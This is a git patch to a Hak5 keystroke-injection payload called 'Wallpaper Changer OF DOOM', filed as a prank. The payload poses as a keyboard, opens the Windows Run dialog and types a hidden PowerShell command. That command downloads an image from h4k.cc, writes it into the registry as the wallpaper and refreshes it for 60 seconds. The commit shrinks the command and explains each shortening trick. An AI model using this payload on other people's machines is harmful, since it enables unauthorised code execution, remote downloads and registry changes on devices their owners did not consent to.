From 0ee25f8d0d6613e7150975d71f945a385b9d0db1 Mon Sep 17 00:00:00 2001
From: Rosius Yves <rosiusyves@yahoo.co.uk>
Date: Wed, 23 Jan 2019 08:24:56 +0100
Subject: [PATCH] Update payload.txt (#365)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Some more shortening. Only 183 characters!

powershell -w h "$p=$home+'\b.jpg';iwr h4k.cc/b.jpg -O $p;SP 'HKCU:Control Panel\Desktop' WallPaper $p;1..59|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}"

* Omit http:// from URI
* powershell -w h to start a hidden powershell windows
* set variable $p for later re-use (saves characters)
* Omit -Uri and redundant characters in -Outfile (-O)
 switches
* 1..59|% to create a loop for 60 seconds
* use $home as directory
---
 .../prank/wallpaper-changer-of-doom/payload.txt  | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/payloads/library/prank/wallpaper-changer-of-doom/payload.txt b/payloads/library/prank/wallpaper-changer-of-doom/payload.txt
index 25d2a6c7..1d2d7a5e 100644
--- a/payloads/library/prank/wallpaper-changer-of-doom/payload.txt
+++ b/payloads/library/prank/wallpaper-changer-of-doom/payload.txt
@@ -1,14 +1,14 @@
 # Wallpaper Changer OF DOOM!!!!
-# Author: Hak5Darren
-# Props: Alex Goat
-# Demo: Hak5 episode 2502 - https://youtu.be/f3C58OKOsuo
-# Target: Windows Vista+
-# Category: Prank
+# Author: Hak5Darren
+# Props: Alex Goat
+# Demo: Hak5 episode 2502 - https://youtu.be/f3C58OKOsuo
+# Target: Windows Vista+
+# Category: Prank
 
 LED SETUP
 ATTACKMODE HID
 LED ATTACK
 Q GUI r
-Q DELAY 500
-Q STRING "cmd /C \"start /MIN powershell iwr -Uri http://h4k.cc/b.jpg -OutFile c:\windows\temp\b.jpg;sp 'HKCU:Control Panel\Desktop' WallPaper 'c:\windows\temp\b.jpg';\$a=1;do{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}while(\$a++-le59)\""
-Q ENTER
\ No newline at end of file
+Q DELAY 500
+Q STRING "powershell -w h \"\$p=\$home+'\b.jpg';iwr h4k.cc/b.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..59|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}""
+Q ENTER